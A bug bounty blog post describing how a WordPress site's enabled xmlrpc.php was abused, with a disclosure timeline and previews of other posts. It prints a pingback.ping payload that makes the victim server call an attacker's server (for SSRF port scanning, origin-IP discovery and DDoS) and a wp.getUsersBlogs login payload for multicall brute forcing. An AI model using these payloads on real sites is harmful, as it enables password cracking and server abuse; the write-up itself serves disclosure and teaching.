Hacking wordpress websites via xmlrpc.php

-

 Hello Folks, Sourav from this side. Hope you are doing awesome on the other side of the screen. I am security enthusiast and bug bounty hunter from India. In this article we will discuss about xmlrpc.php in wordpress websites by leveraging which an attacker can attack wordpress websites.

So let's get started without wasting much time!!


What the heck is xmlrpc.php??

If you guys don't know about xmlrpc.php than please read it about here. But in short xmlrpc.php is a simple, portable way to make remote procedure calls over HTTP. Wordpress, Drupal and most content management system supports XML-RPC.


The core features that xmlrpc enabled were allowing you to connect your via smartphone, implementing tracbacks and pingacks from other sites. 
Note - XML-RPC is enabled y default in all of the versions of wordpress.


Let's move on with the story.....

Since I am not allowed to disclose the name of the website that's why we will use example.com for the sake of this article. So frequently I use online compilers to compile my program during practice. 

One fine day I went to example.com for compiling my code and I observed that they also have a blog hosted on wordpress. Than I quickly thought of checking if xmlrpc.php is enabled or not. And look what I got -


Clearly xmlrpc.php is enabled. Now let's see what we can do with the target if xmlrpc.php is kept 
enabled.

Exploitation

To exploit this, I quickly setup my burp proxy and intercepted the request and change it to POST request. 

Now we can send the below xml payload in the body of the POST request which will list all all the available methods.


I got a response with a list of all available methods. Clearly xmlrpc is enabled and it is working properly.


What's Wrong in XML-RPC enabled?? Impact.....

Now we can see in the above response that pingback.ping available. So lets discuss the stuffs which I can do If pingback.ping is enabled -

I simply sent the below xml payload in the body of the POST request to xmlrpc.php endpoint.

<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>

If you don't own a server than you can use pingbin and postbin. Below is the response which I got from the server.



I got a response from the server and you can see the IP address of the target server. This confirms that I can make the victim server to make ping request to our server. 

DDoS Attack -
This could cause the victim wordpress website to be abused as a botnet to cause a DDoS attack against a host. Please read a scary story here.

Cloudfare protection Bypass -

I can bypass the cloudfare protection to get the real IP of the victim server. If you will do the ping request for the victim than you will get the IP of the cloudfare and not the wordpress. So in this way I manage to bypass the cloudfare protection for the inbound connection.

Cross-site port Attack -

If pingback.ping method is available than I can scan all of the available ports on the host.  Like if you can see in the above response the server is doing pingback.ping request from port no. 58010.
This is a typical case of Blind SSRF which is only limited to port scanning.

Brute force Amplification

I can even brute force attack to find the passwords for a valid username. I can simply use the below given payload in the body of the POST request. 

<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>

Now if you pay attention to the list of available methods from the response shown above, you will find a method called system.multicall method which can execute multiple request inside a single request.

Now using the system.multicall I can reduce the noise of brute force attack. I can perform 500 different login attempts in just 20-30 request. 
For more info read here.


I quickly reported this vulnerability to the website's administrator and below is the timeline of the report.


Reported to the website  ----------------------------------> 5th June, 2020

Triaged and asked for more info -------------------------> 6th June, 2020

The Acknowledge the report ------------------------------> 6th June, 2020


They don't have a Bug Bounty program but they were generous enough to send a amazon gift card for appreciation.




That's all for today folks. Feel free to reach out to me if you have any feedback here.

Stay Hydrated and Keep Hacking!!


Comments

Post a Comment

Popular posts from this blog

How I accidentally found Sensitive data exposure!!

-
Image
  Hello folks, This is Sourav. Hope you are doing awesome on the other side of the screen. I am     security enthusiast and a bug bounty hunter from India. Today I will discuss How I accidentally found a sensitive data exposure during my recon. Okay folks let's get started without wasting any time... One fine day I was looking for some premium themes for wordpress websites and that's how I landed upon a website which provides all kinds Web Development solutions. Since I am not allowed to reveal the name of the website so will take example.com for the sake of this writeup. I don't know what came into me but I thought, let's see how secure is a website itself who provides web development solutions to others. If the website is itself safe enough ?? Let's find out.............. I quickly run amass on example.com and started traversing the application to see how it works. Than I noticed that amass quickly completed its operation. So quickly I took a look at amass outp
Read more

Stories of Pre-Account Takeover

-
Image
Hello Folks, this is Sourav. Hope you are doing well on the other side of the screen. I am a security enthusiast and bug bounty hunter from India. In this blog I will discuss some of my findings on Pre-Account Takeovers. So let's start without wasting much time : What is Pre-Account Takeover?? Pre-Account Takeover is a case of Account Takeover where the attacker has access to the victim's account prior to the victim's registration and then the can observe the victim's actions on the account. So one fine day I started testing the targets for Pre-Account takeovers. So the Pre-Account Takeovers we are discussing in this blog is due to "Improper Oauth Implementation" So you folks might have seen cases where : The website is not verifying the email ID after registration. The website is providing login via 3rd party applications like "Login with Google". Now let's see two slightly different cases which I observed during in the wild - Case 1 In this cas
Read more